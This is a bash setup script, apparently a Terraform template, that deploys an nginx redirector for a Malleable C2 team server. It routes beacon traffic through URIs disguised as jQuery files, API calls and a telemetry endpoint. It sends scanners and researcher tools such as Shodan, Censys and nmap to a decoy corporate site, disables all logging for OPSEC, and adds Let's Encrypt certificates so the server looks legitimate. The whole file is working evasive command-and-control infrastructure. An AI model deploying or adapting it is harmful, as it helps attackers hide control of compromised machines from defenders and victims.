#!/bin/bash
# =============================================================================
# Proxy Redirector Setup Script
# =============================================================================
# Configures nginx as a reverse proxy for C2 traffic
# Handles SSL termination and domain-based routing
#
# Variables passed via Terraform templatefile():
#   - primary_domain: Primary domain (e.g., example.com)
#   - c2_subdomain: C2 subdomain (e.g., api)
#   - c2_server_ip: Internal IP of C2 team server
#   - c2_server_port: Port of C2 team server (default 443)
#   - enable_ssl: Whether to configure SSL (true/false)
#   - ssl_cert_path: Path to SSL certificate (if using custom cert)
#   - ssl_key_path: Path to SSL private key (if using custom cert)
#   - use_letsencrypt: Whether to use Let's Encrypt for SSL
#   - admin_email: Email for Let's Encrypt notifications
#   - ssl_provider: SSL provider ('letsencrypt' or 'self-signed')
#   - ssl_auto_retry: Whether to auto-retry Let's Encrypt when DNS propagates
#   - admin_email: Email for Let's Encrypt notifications
#   - malleable_profile: Name of Malleable C2 profile (for URI matching)
# =============================================================================

set -e

# Variables from Terraform
PRIMARY_DOMAIN="${primary_domain}"
C2_SUBDOMAIN="${c2_subdomain}"
C2_SERVER_IP="${c2_server_ip}"
C2_SERVER_PORT="${c2_server_port}"
ENABLE_SSL="${enable_ssl}"
SSL_PROVIDER="${ssl_provider}"
SSL_AUTO_RETRY="${ssl_auto_retry}"
ADMIN_EMAIL="${admin_email}"
MALLEABLE_PROFILE="${malleable_profile}"
HOSTNAME="${hostname}"

# Derived values
C2_FQDN="$${C2_SUBDOMAIN}.$${PRIMARY_DOMAIN}"
LOG_FILE="/var/log/redirector-setup.log"
SSL_STATUS_FILE="/opt/ssl-status.json"

exec > >(tee -a "$LOG_FILE") 2>&1

echo "=============================================="
echo "Proxy Redirector Setup"
echo "Started: $(date)"
echo "Domain: $PRIMARY_DOMAIN"
echo "C2 FQDN: $C2_FQDN"
echo "SSL Provider: $SSL_PROVIDER"
echo "SSL Auto-Retry: $SSL_AUTO_RETRY"
echo "=============================================="

# Set hostname
if [ -n "$HOSTNAME" ]; then
    hostnamectl set-hostname "$HOSTNAME"
    echo "127.0.0.1 $HOSTNAME" >> /etc/hosts
    echo "Hostname set to: $HOSTNAME"
fi

# =============================================================================
# 1. System Updates and Dependencies
# =============================================================================
echo "[1/5] Installing dependencies..."

# Wait for cloud-init
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
    sleep 5
done

export DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get upgrade -y

# Install nginx and certbot
apt-get install -y \
    nginx \
    nginx-extras \
    libnginx-mod-http-headers-more-filter \
    certbot \
    python3-certbot-nginx \
    curl \
    wget \
    net-tools \
    htop \
    jq \
    fail2ban

echo "Dependencies installed"

# =============================================================================
# 2. Configure Nginx Base
# =============================================================================
echo "[2/5] Configuring nginx..."

# Backup default config
mv /etc/nginx/sites-enabled/default /etc/nginx/sites-available/default.bak 2>/dev/null || true

# Create C2 redirector config
cat > /etc/nginx/sites-available/c2-redirector << 'NGINXEOF'
# C2 Redirector Configuration - OPSEC Hardened
# Generated by Terraform
# 
# OPSEC CONFIGURATION:
# - All logging disabled (access_log off, error_log /dev/null)
# - No data persistence on this server (pass-through only)
# - Ephemeral root volume (deleted on termination)
# - Scanner/bot blocking with decoy responses
# - TLS/SSL for encrypted C2 communications
#
# This redirector is designed for pass-through traffic only.
# No beacon data, logs, or metadata are stored on this system.

# Rate limiting zones
limit_req_zone $binary_remote_addr zone=c2limit:10m rate=10r/s;
limit_conn_zone $binary_remote_addr zone=connlimit:10m;

# GeoIP blocking - block common analyst countries/IPs (customize as needed)
# Uncomment and configure if geoip2 module is installed
# geo $blocked_country {
#     default 0;
#     # Add analyst/researcher IP ranges here
# }

# Upstream C2 server
upstream c2_backend {
    server ${C2_SERVER_IP}:${C2_SERVER_PORT};
    keepalive 32;
}

# Map to validate expected User-Agents (customize to match your Malleable profile)
map $http_user_agent $valid_agent {
    default 0;
    "~*Mozilla/5.0" 1;
    "~*Chrome" 1;
    "~*Safari" 1;
    "~*Edge" 1;
    "~*Firefox" 1;
}

# Map to block known security scanners and crawlers
map $http_user_agent $blocked_agent {
    default 0;
    "~*curl" 1;
    "~*wget" 1;
    "~*python" 1;
    "~*scanner" 1;
    "~*nikto" 1;
    "~*nmap" 1;
    "~*sqlmap" 1;
    "~*masscan" 1;
    "~*zgrab" 1;
    "~*censys" 1;
    "~*shodan" 1;
    "~*bot" 1;
    "~*crawl" 1;
    "~*spider" 1;
}

# HTTP server (redirects to HTTPS)
server {
    listen 80;
    listen [::]:80;
    server_name ${C2_FQDN} ${PRIMARY_DOMAIN} www.${PRIMARY_DOMAIN} cdn.${PRIMARY_DOMAIN};

    # Hide nginx version
    server_tokens off;

    # For Let's Encrypt validation
    location /.well-known/acme-challenge/ {
        root /var/www/html;
    }

    # Redirect all HTTP to HTTPS
    location / {
        return 301 https://$host$request_uri;
    }
}

# HTTPS server (main C2 traffic)
server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    server_name ${C2_FQDN} ${PRIMARY_DOMAIN} www.${PRIMARY_DOMAIN} cdn.${PRIMARY_DOMAIN};

    # Hide nginx version
    server_tokens off;

    # SSL Configuration
    ssl_certificate /etc/nginx/ssl/server.crt;
    ssl_certificate_key /etc/nginx/ssl/server.key;
    
    # Modern SSL settings (matches common browsers)
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305;
    ssl_prefer_server_ciphers off;
    ssl_session_timeout 1d;
    ssl_session_cache shared:SSL:50m;
    ssl_session_tickets off;
    
    # OCSP Stapling (makes SSL look more legitimate)
    ssl_stapling on;
    ssl_stapling_verify on;
    resolver 8.8.8.8 8.8.4.4 valid=300s;
    resolver_timeout 5s;

    # Security headers (mimic legitimate web server)
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-XSS-Protection "1; mode=block" always;
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
    
    # Remove Server header (hide nginx)
    more_clear_headers Server;

    # OPSEC: Disable all logging for C2 traffic
    # No data persistence on redirector - pass-through only
    access_log off;
    error_log /dev/null crit;

    # Rate and connection limiting
    limit_req zone=c2limit burst=20 nodelay;
    limit_conn connlimit 10;

    # Block known bad user agents - return decoy page
    if ($blocked_agent) {
        return 200 "<!DOCTYPE html><html><head><title>Welcome</title></head><body><h1>Welcome</h1><p>Site under construction.</p></body></html>";
    }

    # Default location - serve decoy website
    location / {
        root /var/www/html;
        index index.html index.htm;
        try_files $uri $uri/ =404;
        
        # Custom error pages
        error_page 404 /404.html;
        error_page 500 502 503 504 /50x.html;
    }

    # C2 traffic patterns - MUST match your Malleable C2 profile URIs
    # These are examples - customize based on your actual profile
    
    # jQuery Malleable profile example
    location ~ ^/jquery-3\.[0-9]+\.[0-9]+\.min\.js$ {
        # Validate request looks legitimate
        if ($http_accept !~* "application/javascript|text/javascript|\*/\*") {
            return 404;
        }
        
        proxy_pass https://c2_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Connection "";
        proxy_connect_timeout 60s;
        proxy_send_timeout 60s;
        proxy_read_timeout 300s;
        proxy_buffering on;
    }

    # API-style endpoints (common Malleable profile pattern)
    location ~ ^/api/v[0-9]+/(status|update|sync|data)$ {
        # Must have valid content-type for API
        if ($http_content_type !~* "application/json|application/x-www-form-urlencoded") {
            set $invalid_ct 1;
        }
        if ($request_method = POST) {
            set $invalid_ct "${invalid_ct}1";
        }
        if ($invalid_ct = "11") {
            return 400;
        }
        
        proxy_pass https://c2_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        client_max_body_size 100M;
    }

    # Static assets pattern (CDN-style)
    location ~ ^/(static|assets|dist|build)/(js|css|img|fonts)/[a-zA-Z0-9_-]+\.(js|css|png|jpg|gif|woff2?)$ {
        proxy_pass https://c2_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_cache_valid 200 1h;
    }

    # POST endpoint for beacon data (customize URI)
    location = /api/telemetry {
        if ($request_method != POST) {
            return 405;
        }
        
        proxy_pass https://c2_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        client_max_body_size 100M;
    }

    # Health check (internal only - block from internet)
    location /health {
        allow 10.0.0.0/8;
        allow 172.16.0.0/12;
        allow 192.168.0.0/16;
        allow 127.0.0.1;
        deny all;
        access_log off;
        return 200 "OK";
        add_header Content-Type text/plain;
    }

    # Block common scanning paths
    location ~* ^/(admin|wp-admin|wp-login|phpmyadmin|.git|.env|.htaccess|server-status) {
        return 404;
    }
}
NGINXEOF

# Replace variables in nginx config
sed -i "s/\${C2_SERVER_IP}/$C2_SERVER_IP/g" /etc/nginx/sites-available/c2-redirector
sed -i "s/\${C2_SERVER_PORT}/$C2_SERVER_PORT/g" /etc/nginx/sites-available/c2-redirector
sed -i "s/\${C2_FQDN}/$C2_FQDN/g" /etc/nginx/sites-available/c2-redirector
sed -i "s/\${PRIMARY_DOMAIN}/$PRIMARY_DOMAIN/g" /etc/nginx/sites-available/c2-redirector

# Enable the site
ln -sf /etc/nginx/sites-available/c2-redirector /etc/nginx/sites-enabled/

echo "Nginx configured"

# =============================================================================
# 3. Create Decoy Website
# =============================================================================
echo "[3/5] Creating decoy website..."

mkdir -p /var/www/html

# Create a more realistic decoy website (corporate/SaaS style)
cat > /var/www/html/index.html << 'HTMLEOF'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Enterprise cloud solutions for modern businesses">
    <meta name="robots" content="noindex, nofollow">
    <title>CloudSync Solutions | Enterprise Data Management</title>
    <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg==">
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
            line-height: 1.6;
            color: #333;
            background: #f8f9fa;
        }
        .header {
            background: linear-gradient(135deg, #1a1a2e 0%, #16213e 100%);
            padding: 15px 0;
            position: fixed;
            width: 100%;
            top: 0;
            z-index: 1000;
        }
        .nav {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .logo {
            color: #fff;
            font-size: 1.5em;
            font-weight: 700;
            text-decoration: none;
        }
        .logo span { color: #4a9eff; }
        .nav-links a {
            color: #ccc;
            text-decoration: none;
            margin-left: 30px;
            font-size: 0.95em;
            transition: color 0.3s;
        }
        .nav-links a:hover { color: #fff; }
        .hero {
            background: linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%);
            padding: 150px 20px 100px;
            text-align: center;
            color: #fff;
        }
        .hero h1 {
            font-size: 2.8em;
            margin-bottom: 20px;
            font-weight: 700;
        }
        .hero p {
            font-size: 1.2em;
            opacity: 0.9;
            max-width: 600px;
            margin: 0 auto 30px;
        }
        .btn {
            display: inline-block;
            padding: 15px 40px;
            background: #4a9eff;
            color: #fff;
            text-decoration: none;
            border-radius: 5px;
            font-weight: 600;
            transition: background 0.3s;
        }
        .btn:hover { background: #3a8eef; }
        .features {
            padding: 80px 20px;
            max-width: 1200px;
            margin: 0 auto;
        }
        .features h2 {
            text-align: center;
            margin-bottom: 50px;
            font-size: 2em;
        }
        .feature-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
            gap: 30px;
        }
        .feature-card {
            background: #fff;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 5px 15px rgba(0,0,0,0.08);
        }
        .feature-card h3 {
            margin-bottom: 15px;
            color: #1a1a2e;
        }
        .feature-card p { color: #666; }
        .footer {
            background: #1a1a2e;
            color: #999;
            padding: 40px 20px;
            text-align: center;
        }
        .footer p { font-size: 0.9em; }
    </style>
</head>
<body>
    <header class="header">
        <nav class="nav">
            <a href="/" class="logo">Cloud<span>Sync</span></a>
            <div class="nav-links">
                <a href="#">Solutions</a>
                <a href="#">Pricing</a>
                <a href="#">Documentation</a>
                <a href="#">Contact</a>
            </div>
        </nav>
    </header>
    
    <section class="hero">
        <h1>Enterprise Data Synchronization</h1>
        <p>Secure, scalable cloud infrastructure for modern enterprises. Streamline your data workflows with our industry-leading platform.</p>
        <a href="#" class="btn">Request Demo</a>
    </section>
    
    <section class="features">
        <h2>Why Choose CloudSync?</h2>
        <div class="feature-grid">
            <div class="feature-card">
                <h3>🔒 Enterprise Security</h3>
                <p>SOC 2 Type II certified with end-to-end encryption. Your data is protected with industry-leading security standards.</p>
            </div>
            <div class="feature-card">
                <h3>⚡ Real-time Sync</h3>
                <p>Millisecond latency data synchronization across all your systems. Keep your teams aligned in real-time.</p>
            </div>
            <div class="feature-card">
                <h3>📊 Advanced Analytics</h3>
                <p>Comprehensive dashboards and reporting tools to help you make data-driven decisions.</p>
            </div>
        </div>
    </section>
    
    <footer class="footer">
        <p>&copy; 2024 CloudSync Solutions. All rights reserved.</p>
    </footer>
</body>
</html>
HTMLEOF

# Create custom error pages
cat > /var/www/html/404.html << 'HTMLEOF'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page Not Found | CloudSync</title>
    <style>
        body { font-family: -apple-system, sans-serif; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; background: #f8f9fa; }
        .container { text-align: center; padding: 40px; }
        h1 { font-size: 6em; color: #1a1a2e; margin: 0; }
        p { color: #666; margin: 20px 0; }
        a { color: #4a9eff; text-decoration: none; }
    </style>
</head>
<body>
    <div class="container">
        <h1>404</h1>
        <p>The page you're looking for doesn't exist.</p>
        <a href="/">Return to Homepage</a>
    </div>
</body>
</html>
HTMLEOF

cat > /var/www/html/50x.html << 'HTMLEOF'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Service Unavailable | CloudSync</title>
    <style>
        body { font-family: -apple-system, sans-serif; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; background: #f8f9fa; }
        .container { text-align: center; padding: 40px; }
        h1 { font-size: 3em; color: #1a1a2e; margin: 0; }
        p { color: #666; margin: 20px 0; }
    </style>
</head>
<body>
    <div class="container">
        <h1>Service Temporarily Unavailable</h1>
        <p>We're performing scheduled maintenance. Please try again later.</p>
    </div>
</body>
</html>
HTMLEOF

# Create robots.txt to discourage crawlers
cat > /var/www/html/robots.txt << 'ROBOTSEOF'
User-agent: *
Disallow: /
ROBOTSEOF

echo "Decoy website created"

# =============================================================================
# 4. SSL Certificate Setup
# =============================================================================
echo "[4/5] Setting up SSL..."

mkdir -p /etc/nginx/ssl
mkdir -p /opt/ssl-scripts

# Get this server's public IP
MY_PUBLIC_IP=$(curl -s --max-time 10 https://api.ipify.org || curl -s --max-time 10 https://ifconfig.me || echo "unknown")
echo "This server's public IP: $MY_PUBLIC_IP"

# Function to update SSL status
update_ssl_status() {
    local status=$1
    local message=$2
    local cert_type=$3
    local expiry=$4
    
    cat > "$SSL_STATUS_FILE" << STATUSEOF
{
    "status": "$status",
    "message": "$message",
    "cert_type": "$cert_type",
    "expiry": "$expiry",
    "domain": "$C2_FQDN",
    "provider": "$SSL_PROVIDER",
    "last_updated": "$(date -Iseconds)",
    "public_ip": "$MY_PUBLIC_IP"
}
STATUSEOF
    chmod 644 "$SSL_STATUS_FILE"
}

# Function to check if DNS resolves to this server
check_dns_ready() {
    local resolved_ip=$(dig +short "$C2_FQDN" 2>/dev/null | head -1)
    if [ "$resolved_ip" = "$MY_PUBLIC_IP" ]; then
        return 0
    fi
    return 1
}

# Function to request Let's Encrypt certificate
request_letsencrypt_cert() {
    echo "Requesting Let's Encrypt certificate for $C2_FQDN..."
    
    # Request certificate
    if certbot --nginx -d "$C2_FQDN" -d "$PRIMARY_DOMAIN" -d "www.$PRIMARY_DOMAIN" \
        --non-interactive --agree-tos --email "$ADMIN_EMAIL" \
        --redirect 2>&1; then
        
        echo "Let's Encrypt certificate obtained successfully!"
        
        # Get certificate expiry
        local expiry=$(openssl x509 -enddate -noout -in /etc/letsencrypt/live/$C2_FQDN/fullchain.pem 2>/dev/null | cut -d= -f2 || echo "unknown")
        
        update_ssl_status "valid" "Let's Encrypt certificate active" "letsencrypt" "$expiry"
        
        # Disable the auto-retry service since we succeeded
        systemctl disable ssl-auto-request.timer 2>/dev/null || true
        systemctl stop ssl-auto-request.timer 2>/dev/null || true
        
        return 0
    else
        echo "Let's Encrypt request failed"
        update_ssl_status "pending" "Let's Encrypt request failed - will retry" "self-signed" "N/A"
        return 1
    fi
}

# Create self-signed certificate (always needed as fallback/initial)
create_self_signed_cert() {
    echo "Creating self-signed certificate..."
    openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
        -keyout /etc/nginx/ssl/server.key \
        -out /etc/nginx/ssl/server.crt \
        -subj "/CN=$C2_FQDN/O=CloudSync Solutions/C=US"
    
    chmod 600 /etc/nginx/ssl/server.key
    chmod 644 /etc/nginx/ssl/server.crt
    
    update_ssl_status "self-signed" "Using self-signed certificate" "self-signed" "$(date -d '+365 days' -Iseconds 2>/dev/null || echo 'unknown')"
}

# Create the auto-retry script for Let's Encrypt
create_ssl_auto_retry_script() {
    cat > /opt/ssl-scripts/auto-request-cert.sh << 'AUTOSCRIPT'
#!/bin/bash
# Auto-request Let's Encrypt certificate when DNS is ready
# This script is run by systemd timer

LOG_FILE="/var/log/ssl-auto-request.log"
exec >> "$LOG_FILE" 2>&1

echo "=============================================="
echo "SSL Auto-Request Check: $(date)"
echo "=============================================="

# Load config
source /opt/ssl-scripts/ssl-config.env

# Get current public IP
MY_PUBLIC_IP=$(curl -s --max-time 10 https://api.ipify.org || echo "unknown")

# Check if DNS resolves to this server
RESOLVED_IP=$(dig +short "$C2_FQDN" 2>/dev/null | head -1)

echo "Domain: $C2_FQDN"
echo "Expected IP: $MY_PUBLIC_IP"
echo "Resolved IP: $RESOLVED_IP"

if [ "$RESOLVED_IP" = "$MY_PUBLIC_IP" ]; then
    echo "DNS is ready! Requesting Let's Encrypt certificate..."
    
    # Check if we already have a valid Let's Encrypt cert
    if [ -f "/etc/letsencrypt/live/$C2_FQDN/fullchain.pem" ]; then
        echo "Let's Encrypt certificate already exists"
        
        # Update status
        EXPIRY=$(openssl x509 -enddate -noout -in /etc/letsencrypt/live/$C2_FQDN/fullchain.pem 2>/dev/null | cut -d= -f2 || echo "unknown")
        cat > /opt/ssl-status.json << EOF
{
    "status": "valid",
    "message": "Let's Encrypt certificate active",
    "cert_type": "letsencrypt",
    "expiry": "$EXPIRY",
    "domain": "$C2_FQDN",
    "provider": "letsencrypt",
    "last_updated": "$(date -Iseconds)",
    "public_ip": "$MY_PUBLIC_IP"
}
EOF
        
        # Disable timer
        systemctl disable ssl-auto-request.timer
        systemctl stop ssl-auto-request.timer
        exit 0
    fi
    
    # Request certificate
    if certbot --nginx -d "$C2_FQDN" -d "$PRIMARY_DOMAIN" -d "www.$PRIMARY_DOMAIN" \
        --non-interactive --agree-tos --email "$ADMIN_EMAIL" \
        --redirect; then
        
        echo "SUCCESS: Let's Encrypt certificate obtained!"
        
        EXPIRY=$(openssl x509 -enddate -noout -in /etc/letsencrypt/live/$C2_FQDN/fullchain.pem 2>/dev/null | cut -d= -f2 || echo "unknown")
        cat > /opt/ssl-status.json << EOF
{
    "status": "valid",
    "message": "Let's Encrypt certificate active",
    "cert_type": "letsencrypt",
    "expiry": "$EXPIRY",
    "domain": "$C2_FQDN",
    "provider": "letsencrypt",
    "last_updated": "$(date -Iseconds)",
    "public_ip": "$MY_PUBLIC_IP"
}
EOF
        
        # Disable timer since we succeeded
        systemctl disable ssl-auto-request.timer
        systemctl stop ssl-auto-request.timer
        
        echo "Timer disabled - certificate obtained"
    else
        echo "FAILED: Let's Encrypt request failed - will retry"
        cat > /opt/ssl-status.json << EOF
{
    "status": "pending",
    "message": "Let's Encrypt request failed - will retry in 5 minutes",
    "cert_type": "self-signed",
    "expiry": "N/A",
    "domain": "$C2_FQDN",
    "provider": "letsencrypt",
    "last_updated": "$(date -Iseconds)",
    "public_ip": "$MY_PUBLIC_IP"
}
EOF
    fi
else
    echo "DNS not ready yet (resolved: $RESOLVED_IP, expected: $MY_PUBLIC_IP)"
    echo "Will retry in 5 minutes..."
    
    cat > /opt/ssl-status.json << EOF
{
    "status": "waiting_dns",
    "message": "Waiting for DNS to propagate (resolved: $RESOLVED_IP)",
    "cert_type": "self-signed",
    "expiry": "N/A",
    "domain": "$C2_FQDN",
    "provider": "letsencrypt",
    "last_updated": "$(date -Iseconds)",
    "public_ip": "$MY_PUBLIC_IP"
}
EOF
fi

echo "Check complete"
echo ""
AUTOSCRIPT

    chmod +x /opt/ssl-scripts/auto-request-cert.sh
    
    # Save config for the auto-retry script
    cat > /opt/ssl-scripts/ssl-config.env << CONFIGEOF
C2_FQDN="$C2_FQDN"
PRIMARY_DOMAIN="$PRIMARY_DOMAIN"
ADMIN_EMAIL="$ADMIN_EMAIL"
CONFIGEOF
    
    chmod 600 /opt/ssl-scripts/ssl-config.env
}

# Create systemd service and timer for auto-retry
create_ssl_auto_retry_service() {
    # Service file
    cat > /etc/systemd/system/ssl-auto-request.service << 'SERVICEEOF'
[Unit]
Description=Auto-request Let's Encrypt SSL certificate when DNS is ready
After=network-online.target nginx.service
Wants=network-online.target

[Service]
Type=oneshot
ExecStart=/opt/ssl-scripts/auto-request-cert.sh
StandardOutput=journal
StandardError=journal
SERVICEEOF

    # Timer file (runs every 5 minutes)
    cat > /etc/systemd/system/ssl-auto-request.timer << 'TIMEREOF'
[Unit]
Description=Check DNS and request SSL certificate every 5 minutes

[Timer]
OnBootSec=2min
OnUnitActiveSec=5min
Persistent=true

[Install]
WantedBy=timers.target
TIMEREOF

    systemctl daemon-reload
}

# Main SSL setup logic
if [ "$ENABLE_SSL" = "true" ]; then
    if [ "$SSL_PROVIDER" = "letsencrypt" ] && [ -n "$ADMIN_EMAIL" ]; then
        echo "SSL Provider: Let's Encrypt"
        echo "Admin Email: $ADMIN_EMAIL"
        echo "Auto-Retry: $SSL_AUTO_RETRY"
        
        # Always create self-signed cert first (nginx needs a cert to start)
        create_self_signed_cert
        
        # Create the auto-retry script
        create_ssl_auto_retry_script
        create_ssl_auto_retry_service
        
        # Check if DNS is already ready
        if check_dns_ready; then
            echo "DNS is already configured! Requesting Let's Encrypt certificate now..."
            
            # Start nginx first (needed for HTTP-01 challenge)
            systemctl start nginx || true
            
            # Request certificate
            request_letsencrypt_cert || true
        else
            echo "DNS not yet configured (expected: $MY_PUBLIC_IP)"
            update_ssl_status "waiting_dns" "Waiting for DNS to propagate" "self-signed" "N/A"
            
            if [ "$SSL_AUTO_RETRY" = "true" ]; then
                echo "Enabling auto-retry timer..."
                systemctl enable ssl-auto-request.timer
                systemctl start ssl-auto-request.timer
                echo "Auto-retry enabled - will check every 5 minutes"
            else
                echo "Auto-retry disabled - manual certificate request required"
                update_ssl_status "manual_required" "DNS not ready - manual certificate request required" "self-signed" "N/A"
            fi
        fi
        
    else
        echo "SSL Provider: Self-Signed"
        create_self_signed_cert
    fi
else
    echo "SSL disabled - creating placeholder cert..."
    openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
        -keyout /etc/nginx/ssl/server.key \
        -out /etc/nginx/ssl/server.crt \
        -subj "/CN=localhost"
    
    chmod 600 /etc/nginx/ssl/server.key
    chmod 644 /etc/nginx/ssl/server.crt
    
    update_ssl_status "disabled" "SSL disabled" "none" "N/A"
fi

echo "SSL setup complete"

# =============================================================================
# 5. Start Services
# =============================================================================
echo "[5/5] Starting services..."

# Test nginx config
nginx -t

# Enable and start nginx
systemctl enable nginx
systemctl restart nginx

# Setup automatic cert renewal (if using Let's Encrypt)
if [ "$USE_LETSENCRYPT" = "true" ]; then
    echo "0 12 * * * root certbot renew --quiet" > /etc/cron.d/certbot-renew
fi

# Configure fail2ban for nginx
# Note: Logging is disabled for OPSEC, so fail2ban only monitors nginx auth
cat > /etc/fail2ban/jail.local << 'FAIL2BANEOF'
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 5

[nginx-http-auth]
enabled = true

# OPSEC: Bot/access log monitoring disabled since logging is off
# Relying on external network-level protection instead
FAIL2BANEOF

systemctl enable fail2ban
systemctl restart fail2ban

echo ""
echo "=============================================="
echo "Proxy Redirector Setup Complete!"
echo "Finished: $(date)"
echo "=============================================="
echo ""
echo "Domain: $PRIMARY_DOMAIN"
echo "C2 FQDN: $C2_FQDN"
echo "C2 Backend: $C2_SERVER_IP:$C2_SERVER_PORT"
echo "SSL: $ENABLE_SSL"
echo ""
echo "Test with: curl -k https://$C2_FQDN/health"
echo ""

# Create completion marker
touch /opt/.redirector-setup-complete

